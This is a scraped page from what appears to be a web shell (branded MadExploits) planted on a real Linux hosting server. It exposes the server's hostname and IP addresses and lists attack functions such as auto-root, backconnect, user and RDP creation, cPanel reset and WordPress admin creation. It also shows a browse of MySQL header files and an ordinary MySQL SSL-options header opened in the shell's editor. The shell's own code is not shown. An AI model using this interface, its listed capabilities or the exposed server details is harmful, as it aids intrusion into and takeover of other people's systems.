Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.225.72.181
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
mysql
[ DIR ]
drwxr-xr-x
big_endian.h
3.96
KB
-rw-r--r--
binary_log_types.h
2.59
KB
-rw-r--r--
byte_order_generic.h
2.89
KB
-rw-r--r--
byte_order_generic_x86.h
2.81
KB
-rw-r--r--
decimal.h
5.45
KB
-rw-r--r--
errmsg.h
4.73
KB
-rw-r--r--
keycache.h
7.71
KB
-rw-r--r--
little_endian.h
3.82
KB
-rw-r--r--
m_ctype.h
33.87
KB
-rw-r--r--
m_string.h
10.89
KB
-rw-r--r--
my_alloc.h
2.92
KB
-rw-r--r--
my_byteorder.h
6.03
KB
-rw-r--r--
my_command.h
2.27
KB
-rw-r--r--
my_compiler.h
5.68
KB
-rw-r--r--
my_config.h
919
B
-rw-r--r--
my_config_x86_64.h
12.17
KB
-rw-r--r--
my_dbug.h
9.75
KB
-rw-r--r--
my_dir.h
3.33
KB
-rw-r--r--
my_getopt.h
6.7
KB
-rw-r--r--
my_global.h
22.75
KB
-rw-r--r--
my_list.h
2.14
KB
-rw-r--r--
my_sys.h
39.14
KB
-rw-r--r--
my_thread.h
5.16
KB
-rw-r--r--
my_thread_local.h
2.9
KB
-rw-r--r--
my_xml.h
3.15
KB
-rw-r--r--
mysql.h
29.19
KB
-rw-r--r--
mysql_com.h
24.99
KB
-rw-r--r--
mysql_com_server.h
1.85
KB
-rw-r--r--
mysql_embed.h
1.51
KB
-rw-r--r--
mysql_time.h
2.77
KB
-rw-r--r--
mysql_version.h
1023
B
-rw-r--r--
mysqld_ername.h
122.67
KB
-rw-r--r--
mysqld_error.h
44.6
KB
-rw-r--r--
mysqlx_ername.h
3.63
KB
-rw-r--r--
mysqlx_error.h
3.11
KB
-rw-r--r--
mysqlx_version.h
1.77
KB
-rw-r--r--
plugin.h
26.08
KB
-rw-r--r--
plugin_audit.h
17.52
KB
-rw-r--r--
plugin_ftparser.h
7.86
KB
-rw-r--r--
plugin_group_replication.h
5.93
KB
-rw-r--r--
plugin_keyring.h
6.54
KB
-rw-r--r--
plugin_validate_password.h
1.94
KB
-rw-r--r--
sql_common.h
8
KB
-rw-r--r--
sql_state.h
14.72
KB
-rw-r--r--
sslopt-case.h
2.43
KB
-rw-r--r--
sslopt-longopts.h
3.13
KB
-rw-r--r--
sslopt-vars.h
3.23
KB
-rw-r--r--
thr_cond.h
5.42
KB
-rw-r--r--
thr_mutex.h
5.92
KB
-rw-r--r--
thr_rwlock.h
6.28
KB
-rw-r--r--
typelib.h
2.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sslopt-longopts.h
/* Copyright (c) 2000, 2023, Oracle and/or its affiliates. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License, version 2.0, as published by the Free Software Foundation. This program is also distributed with certain software (including but not limited to OpenSSL) that is licensed under separate terms, as designated in a particular file or component or in included license documentation. The authors of MySQL hereby grant you an additional permission to link the program and your derivative works with the separately licensed software that they have included with MySQL. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License, version 2.0, for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #if defined(HAVE_OPENSSL) && !defined(EMBEDDED_LIBRARY) #ifdef MYSQL_CLIENT {"ssl-mode", OPT_SSL_MODE, "SSL connection mode.", 0, 0, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl", OPT_SSL_SSL, "Deprecated. Use --ssl-mode instead.", &opt_use_ssl_arg, &opt_use_ssl_arg, 0, GET_BOOL, OPT_ARG, 1, 0, 0, 0, 0, 0}, {"ssl-verify-server-cert", OPT_SSL_VERIFY_SERVER_CERT, "Deprecated. Use --ssl-mode=VERIFY_IDENTITY instead.", &opt_ssl_verify_server_cert_arg, &opt_ssl_verify_server_cert_arg, 0, GET_BOOL, OPT_ARG, 0, 0, 0, 0, 0, 0}, #else {"ssl", OPT_SSL_SSL, "If set to ON, this option enforces that SSL is established before client " "attempts to authenticate to the server. To disable client SSL capabilities " "use --ssl=OFF.", &opt_use_ssl, &opt_use_ssl, 0, GET_BOOL, OPT_ARG, 1, 0, 0, 0, 0, 0}, #endif {"ssl-ca", OPT_SSL_CA, "CA file in PEM format.", &opt_ssl_ca, &opt_ssl_ca, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl-capath", OPT_SSL_CAPATH, "CA directory.", &opt_ssl_capath, &opt_ssl_capath, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl-cert", OPT_SSL_CERT, "X509 cert in PEM format.", &opt_ssl_cert, &opt_ssl_cert, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl-cipher", OPT_SSL_CIPHER, "SSL cipher to use.", &opt_ssl_cipher, &opt_ssl_cipher, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl-key", OPT_SSL_KEY, "X509 key in PEM format.", &opt_ssl_key, &opt_ssl_key, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl-crl", OPT_SSL_CRL, "Certificate revocation list.", &opt_ssl_crl, &opt_ssl_crl, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"ssl-crlpath", OPT_SSL_CRLPATH, "Certificate revocation list path.", &opt_ssl_crlpath, &opt_ssl_crlpath, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, {"tls-version", OPT_TLS_VERSION, "TLS version to use, " "permitted values are: TLSv1, TLSv1.1, TLSv1.2", &opt_tls_version, &opt_tls_version, 0, GET_STR, REQUIRED_ARG, 0, 0, 0, 0, 0, 0}, #endif /* HAVE_OPENSSL */
Close